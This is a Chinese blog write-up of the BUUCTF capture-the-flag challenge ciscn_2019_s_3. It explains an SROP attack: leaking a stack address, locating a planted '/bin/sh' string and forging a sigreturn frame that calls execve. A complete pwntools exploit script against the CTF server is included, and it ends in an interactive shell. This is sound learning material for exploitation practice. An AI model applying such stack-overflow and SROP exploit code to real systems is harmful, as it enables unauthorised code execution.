buuctf ciscn_2019_s_3

最新推荐文章于 2023-04-24 19:26:41 发布
最新推荐文章于 2023-04-24 19:26:41 发布
阅读量1.3k 收藏 2
点赞数
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/carol2358/article/details/105643009
版权

这题对还是萌新的我来说有点难,用的SROP

在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
可以看到gadget函数里rax可以从两个值里选一个,选3b就是rop,选0f就是srop。本题因为vul里没有leave,只有ret,所以溢出为0x10
在这里插入图片描述
在送过去p1 = flat([’/bin/sh\x00’, ‘b’*8, read_write])之后,可以得到0x30个字符的回应。通过把断点下在write(0x400503),然后调试,可以接收到0x30个字符,其中0x20到0x28是一个栈上的地址,我们可以用它来确定/bin/sh的位置。
那我们需要确定栈的位置和栈的偏移。
栈的位置我们可以通过main函数的参数argv[0]得到,就是程序一开始时候的rsi,偏移只要我们输入数据之后(aaaa),find aaaa找到他的地址,然后相减就可以了
0x7fffffffe068 - 0x7fffffffdf50 = 0x118,那么我们接收到的地址-0x118就是我们/bin/sh的地址了。
为了溢出,我们要写’/bin/sh\x00’凑足8个字符。

exp:

from pwn import *
from LibcSearcher import * 

local_file  = './ciscn_s_3'
#local_libc  = '/lib/x86_64-linux-gnu/libc.so.6'
#remote_libc = './libc.so.6'

select = 1

if select == 0:
    r = process(local_file)
    #libc = ELF(local_libc)
else:
    r = remote('node3.buuoj.cn', 25236)
    #libc = ELF(remote_libc)

elf = ELF('./ciscn_s_3')

context.log_level = 'debug'
context.arch = elf.arch

se      = lambda data               :r.send(data) 
sa      = lambda delim,data         :r.sendafter(delim, data)
sl      = lambda data               :r.sendline(data)
sla     = lambda delim,data         :r.sendlineafter(delim, data)
sea     = lambda delim,data         :r.sendafter(delim, data)
rc      = lambda numb=4096          :r.recv(numb)
rl      = lambda                    :r.recvline()
ru      = lambda delims, drop=True  :r.recvuntil(delims, drop)
uu32    = lambda data               :u32(data.ljust(4, '\0'))
uu64    = lambda data               :u64(data.ljust(8, '\0'))
info_addr = lambda tag, addr        :r.info(tag + ': {:#x}'.format(addr))

def debug(cmd=''):
    if is_local: gdb.attach(r,cmd)


sigreturn = 0x4004DA
system_call = 0x0400517
read_write = 0x4004F1
main_addr = elf.sym['main']

p1 = flat(['/bin/sh\x00', 'b'*8, read_write])
sl(p1)
rc(32)
binsh_addr = u64(rc(8)) - 0x118
rc(8)

frame = SigreturnFrame()
frame.rax = constants.SYS_execve 
frame.rdi = binsh_addr
frame.rsi = 0
frame.rdx = 0
frame.rip = system_call

p2 = flat(['a'*0x10, sigreturn, system_call, frame])
sl(p2)


r.interactive()

read_write是为了重新运行,送p2,p2的构造就是srop,溢出,syscall的序号,使用syscall,然后保证frame在栈顶,我们这frame使用execve这个函数

真岛忍
关注
  • 0
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
[PWN] BUUCTF ciscn_2019_s_3
空城惜梦的博客
05-31 505
Ciscn_2019_s_3的调试过程步骤payload参考wp 步骤 按照惯例先checksec 用64位ida打开发现main中只要一个关键函数vuln,以及发现有gadgets函数 记录vuln地址:0x4004ED 分析vuln发现进行了系统调用,一个是sys_read,一个是sys_write 调用号:sys_read 的调用号 为 0 ;sys_write 的调用号 为 1; 记录syscall地址:0x400501或0x400517 图中分别给read的三个参数赋值0,&buf,
[BUUCTF]PWN21——ciscn_2019_s_3
mcmuyanga的博客
09-07 1402
[BUUCTF]PWN21——ciscn_2019_s_3 附件 步骤 例行检查,64位,开启了NX保护 试运行的时候回显是一些乱码,直接用ida打开,从main函数开始看 main函数调用了vuln函数 __asm 关键字用于调用内联汇编程序,并且可在 C 或 C++ 语句合法时出现。 我们首先要了解一下64位系统的系统调用 传参方式:首先将系统调用号 传入 rax,然后将参数 从左到右 依次存入 rdi,rsi,rdx寄存器中,返回值存在rax寄存器 调用号:sys_read 的调用号 为 0 ;
BUUCTF(pwn) ciscn_2019_s_3 [ 栈溢出SROP攻击]
半岛铁盒的博客
08-10 347
64位,开启了NX保护 main函数调用了vuln
ciscn_2019_s_3
qq_45691294的博客
12-29 2128
首先拿到程序先查看一下程序类型 是一个x86-64的ELF文件,查看一下保护,只开启了堆栈不可执行保护 用IDA分析一下该程序 main函数直接进入到vuln函数,这里利用了系统调用,64位的系统调用的传参方式为 首先将系统调用号 传入 rax,然后将参数 从左到右 依次存入 rdi,rsi,rdx寄存器中,返回值存在rax寄存器 vuln函数执行了read(0,buf,0x400),又执行了write(1,buf,0x30)。看一下buf的位置,发现距离rbp只有0x10大小,存在栈溢出 这里的栈
BUUCTF ciscn_2019_s_3 对于零基础小白很烧脑的一道入门题
weixin_44447516的博客
08-25 237
pwn buuctf ciscn_2019_s_3 入门
get_started_3dsctf_2016|get_started_3dsctf_2016
12-11
网络安全逆向PWN题目,简单的栈溢出,虽然有后门函数,但同时又给了一定的限制条件,可以使用更复杂的ROP解法。该样本题解:https://blog.csdn.net/A951860555/article/details/111030289
BasicASM.s(BUUCTF
06-04
分析过程文件
BUUCTF逆向前八题
最新发布
01-24
内容为BUUCTF里reserve的前八题自己的一些解题思路
BUUCTF-PWN-[ZJCTF 2019]Login
07-10
BUUCTF-PWN-[ZJCTF 2019]Login
BUUCTF】web之强网杯2019随便注
12-14
开始注入: 1’ : 报错 1’ #:回显正常 1’ order by 1 #: 正常(经测试列数为2–此处小白暗自窃喜) 1’ union select 1,2#: 回显 如图 看来此方法是行不通了,但经过苦苦寻求,了解到了堆叠注入: ...
baby_pwn ciscn 2019 第十二届全国大学生信息安全竞赛
04-22
baby_pwn 赛题 ciscn 2019 第十二届全国大学生信息安全竞赛
BUUCTFPwn】Ciscn_2019_s_3 | SROP SigreturnFrame函数使用
m0_55368674的博客
02-18 462
BUUCTFPwn】Ciscn_2019_s_3 | SROP SigreturnFrame函数使用
ctf【ciscn_2019_s_3】
HUANGliang_的博客
10-29 461
ciscn_2019_s_3
BUUCTF pwn——ciscn_2019_s_3
CNS-Enterprise BCC-1701-J
04-24 89
BUUCTF 做题练习
ciscn_2019_s_3(execve&&sigreturn)
qq_33590156的博客
08-04 204
本题是一个系统调用,存在栈溢出,要点有以下几点,以下为第一种解法,构造execve(’/bin/sh’,0,0) 1.题目中,并未出现sub esp得字眼,所以本题中ebp一直与esp重合,即最后ret得时候,pop的其实是rbp处的地址,所以本题返回点并不在ret处,而在rbp处。 2.本题没有‘/bin/sh’,所以只能自己输入到栈上,这时就需要泄漏栈的地址,在使用gdb调试后,可以看到在ret地址后面有存储一个栈地址(即可以泄漏),再在调用syswrite时,可以看到buf的地址,经过计算后,得出偏移
【pwn】ciscn_2019_s_3
Nothing
12-14 4497
这题是全国大学生信息安全竞赛的一道线下半决赛题目,好像是华南赛区? 例行检查。 分析程序。 vul函数 两个系统调用,一个是sys_read,一个是sys_write,往栈上写数据(0x400),从栈上读数据(0x30),存在栈溢出。 还有一个gadget函数。 有两个值得注意的地方。mov rax,0fh 以及mov rax 59。这两个gadget控制了rax的值,看看这两个是什么系统调用...
CTF buuoj pwn-----第12题: ciscn_2019_s_3
bing_Max的博客
10-09 1464
函数分析 编写exp from pwn import * sh = remote('node4.buuoj.cn', 27939) context(arch='amd64',os='linux', log_level='debug') main_addr= 0x4004ED # 这里其实是vuln的地址, main地址会错:timeout: the monitored command dumped core payload_1 = b'/bin/sh\x00' + b'a'*0x8 + p.
【Pwn】ciscn_2019_s_3 wp 解析(bin/sh+0x50)
Lcw_linyx的博客
05-09 1088
本题用到了ret2csu,也可通过srop,重点讲/bin/sh+0x50
buuctf luky_guy
09-28
Luky库是一组抽象复杂操作的Java类,它提供了各种功能,包括网络操作,事件处理,加密,数据库处理,snmp监视,队列,信号量,解析器和XML处理程序等。根据提供的引用内容,无法直接了解到buuctf luky_guy的具体信息。如果您能提供更多关于buuctf luky_guy的背景信息,我可以尝试为您提供更准确的答案。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值